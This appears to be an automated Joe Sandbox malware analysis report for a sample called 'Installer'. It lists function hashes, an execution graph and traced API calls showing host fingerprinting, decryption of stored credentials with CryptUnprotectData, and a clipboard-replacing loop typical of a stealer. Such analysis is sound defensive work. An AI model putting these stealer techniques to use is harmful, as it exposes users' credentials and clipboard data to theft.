                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 3fc67f2eca506d9bb93ef8dd45fe0c9a6afef89c77e00d5c2118219ddc1fc749
                                                                                                                                                                                                                                                    • Instruction ID: b5af09d52566c6b8535ea93e5b8d7e0310d59ab860fdef90cee510f8ff9d0ecf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc67f2eca506d9bb93ef8dd45fe0c9a6afef89c77e00d5c2118219ddc1fc749
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88415931900249EFCF16DF94CC81EAEBBB5BF48301F198159FD14AB221D3359954DB91
                                                                                                                                                                                                                                                    Function 0035B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0035B475
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: af5adfafb35bc47e4538fa7f6a7d4a1834672c2df0c3fe839954aceda9cd7bfd
                                                                                                                                                                                                                                                    • Instruction ID: bd95583374b4524900fbd54f8e52f8a5132a8e9b86138774bdf70f5e8668abf4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af5adfafb35bc47e4538fa7f6a7d4a1834672c2df0c3fe839954aceda9cd7bfd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31B4B1400219EBCF2B9F51C840CAAFB66FF0A316B194A5AFD4449132D332DD69DBC1
                                                                                                                                                                                                                                                    Function 0034B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034B8B9
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?), ref: 0034B8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,00000000,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                      • Part of subcall function 00358353: IsProcessorFeaturePresent.KERNEL32(00000017,0035378B,?,?,?,?,00000000,?,?,?,0034B5AC,0034B4E0,00000000,?,?,0034B4E0), ref: 0035836F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 7163041cfe131668073d4e0cb508c92508843b21a47d289ae2a4aa47554f3c32
                                                                                                                                                                                                                                                    • Instruction ID: 6fd867c1edb22f4dfcf11d0c4d9ec3cabdf6f637751b9cb28c5d870b53d0067e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7163041cfe131668073d4e0cb508c92508843b21a47d289ae2a4aa47554f3c32
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28212332E00258ABCF269F99D845AAEF7F9AF44710F1A0419E906AF251CB74FD458B81
                                                                                                                                                                                                                                                    Function 0034B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 49d90b9156ea27dcf9c095b4e568480555acce01824235d369e4c5aa786fd053
                                                                                                                                                                                                                                                    • Instruction ID: 7575760331b262d4d5252574687621eab1024c7ca8812d132648d09d717308a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49d90b9156ea27dcf9c095b4e568480555acce01824235d369e4c5aa786fd053
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D10171F1614301ABDB159F28D855A5BBBE8DF08318F11881CF45D9F351D379E858CB81
                                                                                                                                                                                                                                                    Function 00342610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,00000000,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction ID: 9cea460e9543a65c50e711778be0718b2a77089908f449da2b5c7e84535b5cae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F0F8F5A14300ABD715AF18D945B47BBE4EB49719F01C81CF9989B310D3B9D458CB92

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:10.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:5.7%
                                                                                                                                                                                                                                                    Signature Coverage:45.9%
                                                                                                                                                                                                                                                    Total number of Nodes:279
                                                                                                                                                                                                                                                    Total number of Limit Nodes:18
                                                                                                                                                                                                                                                    execution_graph 14438 423d40 14439 423da0 14438->14439 14439->14439 14440 423df5 RtlExpandEnvironmentStrings 14439->14440 14443 423e40 14440->14443 14441 424157 14451 42429d 14441->14451 14456 421b10 14441->14456 14442 423ebd 14443->14441 14443->14442 14445 423e9e RtlExpandEnvironmentStrings 14443->14445 14447 423edb 14443->14447 14449 423fd1 14443->14449 14445->14441 14445->14442 14445->14447 14445->14449 14446 424141 GetLogicalDrives 14450 441da0 LdrInitializeThunk 14446->14450 14447->14447 14452 441da0 14447->14452 14449->14441 14449->14446 14449->14449 14450->14441 14451->14451 14453 441dc0 14452->14453 14453->14453 14454 441ece 14453->14454 14468 43eba0 LdrInitializeThunk 14453->14468 14454->14449 14469 441c20 14456->14469 14458 421b53 14466 422288 14458->14466 14473 43cac0 14458->14473 14460 421bac 14463 421c20 14460->14463 14476 43eba0 LdrInitializeThunk 14460->14476 14462 43cac0 RtlAllocateHeap 14462->14463 14463->14462 14465 422200 14463->14465 14477 43eba0 LdrInitializeThunk 14463->14477 14465->14466 14478 43eba0 LdrInitializeThunk 14465->14478 14466->14451 14468->14454 14470 441c40 14469->14470 14470->14470 14471 441d4e 14470->14471 14479 43eba0 LdrInitializeThunk 14470->14479 14471->14458 14480 440240 14473->14480 14475 43caca RtlAllocateHeap 14475->14460 14476->14460 14477->14463 14478->14465 14479->14471 14481 440250 14480->14481 14481->14475 14481->14481 14641 441700 14642 44170f 14641->14642 14643 44185e 14642->14643 14649 43eba0 LdrInitializeThunk 14642->14649 14644 43cac0 RtlAllocateHeap 14643->14644 14647 4419ae 14643->14647 14646 4418d3 14644->14646 14646->14646 14646->14647 14650 43eba0 LdrInitializeThunk 14646->14650 14649->14643 14650->14647 14651 440e00 14652 440e20 14651->14652 14653 440e6e 14652->14653 14659 43eba0 LdrInitializeThunk 14652->14659 14655 43cac0 RtlAllocateHeap 14653->14655 14658 440f7f 14653->14658 14656 440f02 14655->14656 14656->14658 14660 43eba0 LdrInitializeThunk 14656->14660 14659->14653 14660->14658 14661 43f308 14662 43f330 14661->14662 14665 43eba0 LdrInitializeThunk 14662->14665 14664 43f394 14665->14664 14482 40cd4e 14483 40cd70 14482->14483 14486 4396a0 14483->14486 14485 40ce68 14485->14485 14487 4396d0 CoCreateInstance 14486->14487 14489 4399b9 SysAllocString 14487->14489 14490 439d5f 14487->14490 14493 439a3c 14489->14493 14491 439d6f GetVolumeInformationW 14490->14491 14501 439d91 14491->14501 14494 439a44 CoSetProxyBlanket 14493->14494 14495 439d4e SysFreeString 14493->14495 14496 439d44 14494->14496 14497 439a64 SysAllocString 14494->14497 14495->14490 14496->14495 14499 439b50 14497->14499 14499->14499 14500 439b66 SysAllocString 14499->14500 14503 439b8e 14500->14503 14501->14485 14502 439d32 SysFreeString SysFreeString 14502->14496 14503->14502 14504 439d28 14503->14504 14505 439bd6 VariantInit 14503->14505 14504->14502 14506 439c20 14505->14506 14506->14506 14507 439d17 VariantClear 14506->14507 14507->14504 14508 40d7cf 14509 40d7d5 14508->14509 14510 40d7df CoUninitialize 14509->14510 14511 40d800 14510->14511 14666 430412 CoSetProxyBlanket 14667 43f211 14668 43f213 14667->14668 14669 43f26e 14668->14669 14671 43eba0 LdrInitializeThunk 14668->14671 14669->14669 14671->14669 14672 439490 14673 4394b0 14672->14673 14675 43952e 14673->14675 14681 43eba0 LdrInitializeThunk 14673->14681 14676 4395c0 14675->14676 14678 4395be 14675->14678 14680 43eba0 LdrInitializeThunk 14675->14680 14678->14676 14682 43eba0 LdrInitializeThunk 14678->14682 14680->14678 14681->14675 14682->14676 14512 410a57 14513 410a74 14512->14513 14514 410d5c RtlExpandEnvironmentStrings 14513->14514 14516 40ec78 14513->14516 14517 410dc7 14514->14517 14517->14516 14518 415200 14517->14518 14519 415220 14518->14519 14519->14519 14520 441c20 LdrInitializeThunk 14519->14520 14521 41535d 14520->14521 14522 4155de 14521->14522 14523 41537f 14521->14523 14529 4155f2 14521->14529 14531 4153c3 14521->14531 14541 441f20 14521->14541 14522->14516 14527 41576c 14523->14527 14523->14529 14523->14531 14545 441fe0 14523->14545 14527->14516 14530 441c20 LdrInitializeThunk 14529->14530 14532 41575d 14530->14532 14531->14522 14552 43eba0 LdrInitializeThunk 14531->14552 14532->14527 14533 4157a5 14532->14533 14534 441f20 LdrInitializeThunk 14532->14534 14535 4157f3 14532->14535 14540 41582f 14532->14540 14533->14527 14533->14535 14536 441fe0 LdrInitializeThunk 14533->14536 14533->14540 14534->14533 14537 441fe0 LdrInitializeThunk 14535->14537 14536->14535 14537->14540 14539 415b70 CryptUnprotectData 14539->14527 14539->14540 14540->14527 14540->14539 14551 43eba0 LdrInitializeThunk 14540->14551 14543 441f40 14541->14543 14542 441f8e 14542->14523 14543->14542 14553 43eba0 LdrInitializeThunk 14543->14553 14546 442000 14545->14546 14548 44204e 14546->14548 14554 43eba0 LdrInitializeThunk 14546->14554 14547 4153b1 14547->14527 14547->14529 14547->14531 14548->14547 14548->14548 14555 43eba0 LdrInitializeThunk 14548->14555 14551->14540 14552->14527 14553->14542 14554->14548 14555->14547 14556 42c4da 14557 42c4ed GetComputerNameExA 14556->14557 14691 43f123 14692 43f150 14691->14692 14693 43f18e 14692->14693 14697 43eba0 LdrInitializeThunk 14692->14697 14695 43f26e 14693->14695 14698 43eba0 LdrInitializeThunk 14693->14698 14697->14693 14698->14695 14699 42cca2 14700 42ccac 14699->14700 14701 42cd94 GetPhysicallyInstalledSystemMemory 14700->14701 14702 42cdd0 14701->14702 14702->14702 14560 421460 14561 42146e 14560->14561 14563 4214c0 14560->14563 14564 421580 14561->14564 14565 421590 14564->14565 14565->14565 14566 441da0 LdrInitializeThunk 14565->14566 14567 42167f 14566->14567 14703 43cb20 14704 43cb40 14703->14704 14705 43cc0e 14704->14705 14711 43eba0 LdrInitializeThunk 14704->14711 14706 43cac0 RtlAllocateHeap 14705->14706 14708 43cdae 14705->14708 14709 43ccc1 14706->14709 14709->14708 14712 43eba0 LdrInitializeThunk 14709->14712 14711->14705 14712->14708 14568 440ce0 14569 440d00 14568->14569 14571 440dcf 14569->14571 14572 43eba0 LdrInitializeThunk 14569->14572 14572->14571 14573 40cfe8 14575 40d050 14573->14575 14574 40d09e 14578 43eba0 LdrInitializeThunk 14574->14578 14575->14574 14579 43eba0 LdrInitializeThunk 14575->14579 14578->14574 14579->14574 14713 43ed29 14714 43ed32 GetForegroundWindow 14713->14714 14715 43ed46 14714->14715 14580 40adec 14581 40adff 14580->14581 14583 40adf8 14580->14583 14581->14581 14581->14583 14584 43eb40 14581->14584 14585 43eb58 14584->14585 14586 43eb7a 14584->14586 14589 43eb80 14584->14589 14588 43eb6b RtlReAllocateHeap 14585->14588 14585->14589 14587 43cac0 RtlAllocateHeap 14586->14587 14587->14589 14588->14589 14589->14581 14724 42c3ae 14725 42c3ba FreeLibrary 14724->14725 14727 42c3eb 14725->14727 14727->14727 14728 42c494 GetComputerNameExA 14727->14728 14729 42c4cf 14728->14729 14729->14729 14590 4085f0 14592 4085ff 14590->14592 14591 4087f0 ExitProcess 14592->14591 14593 408614 GetCurrentProcessId GetCurrentThreadId 14592->14593 14594 4087d9 14592->14594 14595 408643 SHGetSpecialFolderPathW 14593->14595 14596 4087e2 14594->14596 14599 4086d0 14595->14599 14609 43eb20 14596->14609 14599->14599 14600 43cac0 RtlAllocateHeap 14599->14600 14601 4086f7 GetForegroundWindow 14600->14601 14603 40876b 14601->14603 14603->14594 14604 4087d4 14603->14604 14606 40b470 FreeLibrary 14604->14606 14607 40b48c 14606->14607 14608 40b491 FreeLibrary 14607->14608 14608->14594 14612 440220 14609->14612 14611 43eb25 FreeLibrary 14611->14591 14613 440229 14612->14613 14613->14611 14614 43caf2 14615 43cb11 14614->14615 14616 43cb00 14614->14616 14617 43cb05 RtlFreeHeap 14616->14617 14617->14615 14618 426b70 14619 426b90 14618->14619 14620 426bde 14619->14620 14626 43eba0 LdrInitializeThunk 14619->14626 14621 426cbe 14620->14621 14622 43cac0 RtlAllocateHeap 14620->14622 14624 426c5c 14622->14624 14624->14621 14627 43eba0 LdrInitializeThunk 14624->14627 14626->14620 14627->14621 14730 40c5b6 CoInitializeEx CoInitializeEx 14628 433b7a 14629 433b7f 14628->14629 14630 433bb5 GetSystemMetrics GetSystemMetrics 14629->14630 14631 433bf4 14630->14631 14632 437c78 14634 437bc1 14632->14634 14636 437c7b 14632->14636 14633 437bc9 14634->14633 14639 43eba0 LdrInitializeThunk 14634->14639 14637 438084 14636->14637 14640 43eba0 LdrInitializeThunk 14636->14640 14639->14634 14640->14636 14731 40c73b CoInitializeSecurity 14732 42d0be 14734 42d0f0 14732->14734 14733 42d1be 14734->14733 14736 43eba0 LdrInitializeThunk 14734->14736 14736->14733 14737 422e3f 14739 422e58 14737->14739 14751 422f07 14737->14751 14738 422f02 14741 4233de 14738->14741 14744 423592 14738->14744 14745 4232fe 14738->14745 14738->14751 14739->14738 14752 43eba0 LdrInitializeThunk 14739->14752 14753 43eba0 LdrInitializeThunk 14741->14753 14742 423779 14743 423b9e 14742->14743 14742->14751 14757 43eba0 LdrInitializeThunk 14742->14757 14754 43eba0 LdrInitializeThunk 14743->14754 14744->14742 14744->14751 14756 43eba0 LdrInitializeThunk 14744->14756 14745->14741 14755 43eba0 LdrInitializeThunk 14745->14755 14752->14738 14753->14751 14754->14751 14755->14741 14756->14742 14757->14743 14758 40dfbe 14761 412100 14758->14761 14760 40dfc4 14769 412114 14761->14769 14762 4122bc 14762->14760 14763 4129f8 RtlExpandEnvironmentStrings 14763->14769 14764 412cc1 RtlExpandEnvironmentStrings 14764->14769 14765 413ddc CreateThread 14765->14769 14767 43eba0 LdrInitializeThunk 14767->14769 14769->14762 14769->14763 14769->14764 14769->14765 14769->14767 14770 441a90 14769->14770 14774 442140 14769->14774 14772 441ab0 14770->14772 14771 441bbe 14771->14769 14772->14771 14780 43eba0 LdrInitializeThunk 14772->14780 14776 442160 14774->14776 14775 44224e 14775->14769 14778 4421ae 14776->14778 14781 43eba0 LdrInitializeThunk 14776->14781 14778->14775 14782 43eba0 LdrInitializeThunk 14778->14782 14780->14771 14781->14778 14782->14775 14783 4fe1000 14784 4fe1102 14783->14784 14785 4fe1012 14783->14785 14786 4fe103a OpenClipboard 14785->14786 14787 4fe1030 Sleep 14785->14787 14788 4fe104a GetClipboardData 14786->14788 14789 4fe10f9 GetClipboardSequenceNumber 14786->14789 14787->14785 14790 4fe105a GlobalLock 14788->14790 14791 4fe10f3 CloseClipboard 14788->14791 14789->14785 14790->14791 14792 4fe106b GlobalAlloc 14790->14792 14791->14789 14794 4fe109d GlobalLock 14792->14794 14795 4fe10e9 GlobalUnlock 14792->14795 14796 4fe10b0 14794->14796 14795->14791 14797 4fe10b9 GlobalUnlock 14796->14797 14798 4fe10cb EmptyClipboard SetClipboardData 14797->14798 14799 4fe10e0 GlobalFree 14797->14799 14798->14795 14798->14799 14799->14795

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 004396A0 Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 644memorycomCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 4396a0-4396ca 1 4396d0-439730 0->1 1->1 2 439732-439747 1->2 3 439750-4397bb 2->3 3->3 4 4397bd-4397ff 3->4 5 439800-43982a 4->5 5->5 6 43982c-43984b 5->6 8 439922-43992f 6->8 9 439851-43985f 6->9 10 439930-439957 8->10 11 439860-4398ca 9->11 10->10 13 439959-4399b3 CoCreateInstance 10->13 11->11 12 4398cc-4398df 11->12 14 4398e0-439916 12->14 15 4399b9-4399ea 13->15 16 439d5f-439d8f call 440690 GetVolumeInformationW 13->16 14->14 17 439918-43991d 14->17 18 4399f0-439a11 15->18 22 439d91-439d95 16->22 23 439d99-439d9b 16->23 17->8 18->18 21 439a13-439a3e SysAllocString 18->21 28 439a44-439a5e CoSetProxyBlanket 21->28 29 439d4e-439d5b SysFreeString 21->29 22->23 24 439dad-439db4 23->24 26 439dc0-439dd5 24->26 27 439db6-439dbd 24->27 30 439de0-439e15 26->30 27->26 31 439d44-439d4a 28->31 32 439a64-439a76 28->32 29->16 30->30 33 439e17-439e2f 30->33 31->29 34 439a80-439ace 32->34 35 439e30-439e44 33->35 34->34 36 439ad0-439b4a SysAllocString 34->36 35->35 37 439e46-439e69 call 41e540 35->37 38 439b50-439b64 36->38 43 439e70-439e77 37->43 38->38 39 439b66-439b94 SysAllocString 38->39 44 439d32-439d42 SysFreeString * 2 39->44 45 439b9a-439bbc 39->45 43->43 46 439e79-439e8c 43->46 44->31 53 439bc2-439bc5 45->53 54 439d28-439d2e 45->54 47 439e92-439ea5 call 408050 46->47 48 439da0-439da7 46->48 47->48 48->24 50 439eaa-439eb1 48->50 53->54 55 439bcb-439bd0 53->55 54->44 55->54 56 439bd6-439c1f VariantInit 55->56 57 439c20-439c37 56->57 57->57 58 439c39-439c47 57->58 59 439c4b-439c4d 58->59 60 439c53-439c59 59->60 61 439d17-439d24 VariantClear 59->61 60->61 62 439c5f-439c6d 60->62 61->54 63 439c6f-439c74 62->63 64 439cad 62->64 65 439c8c-439c90 63->65 66 439caf-439cd7 call 407fd0 call 408b00 64->66 67 439c92-439c9b 65->67 68 439c80 65->68 77 439cd9 66->77 78 439cde-439cea 66->78 71 439ca2-439ca6 67->71 72 439c9d-439ca0 67->72 70 439c81-439c8a 68->70 70->65 70->66 71->70 74 439ca8-439cab 71->74 72->70 74->70 77->78 79 439cf1-439d14 call 408000 call 407fe0 78->79 80 439cec 78->80 79->61 80->79
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0044468C,00000000,00000001,0044467C,00000000), ref: 004399AB
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(C197C794), ref: 00439A18
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439A56
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(B2ECBC14), ref: 00439AD9
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(77B37587), ref: 00439B6B
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(BFBEBDA4), ref: 00439BDB
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(BFBEBDA4), ref: 00439D18
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00439D3C
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00439D42
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00439D4F
                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00439D8B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                    • String ID: &v
                                                                                                                                                                                                                                                    • API String ID: 2573436264-996230610
                                                                                                                                                                                                                                                    • Opcode ID: c76a795488dcaea1087b38c4a21f4ec032b56208ede1dfedf05bb0fa22a11b63
                                                                                                                                                                                                                                                    • Instruction ID: 2eae229d14a92933328e5725d2ae13478f160aa11d56bd9171fe0ff53e23d803
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c76a795488dcaea1087b38c4a21f4ec032b56208ede1dfedf05bb0fa22a11b63
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E22F072A083409FD714CF29C845B5BBBE6EFC9324F18992DE5958B381DB78D805CB86
                                                                                                                                                                                                                                                    Function 04FE1000 Relevance: 19.6, APIs: 13, Instructions: 81clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 04FE1032
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 04FE103C
                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 04FE104C
                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 04FE105D
                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04FE1090
                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 04FE10A0
                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32 ref: 04FE10C1
                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 04FE10CB
                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D), ref: 04FE10D6
                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 04FE10E3
                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 04FE10ED
                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 04FE10F3
                                                                                                                                                                                                                                                    • GetClipboardSequenceNumber.USER32 ref: 04FE10F9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522921714.0000000004FE1000.00000020.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: true
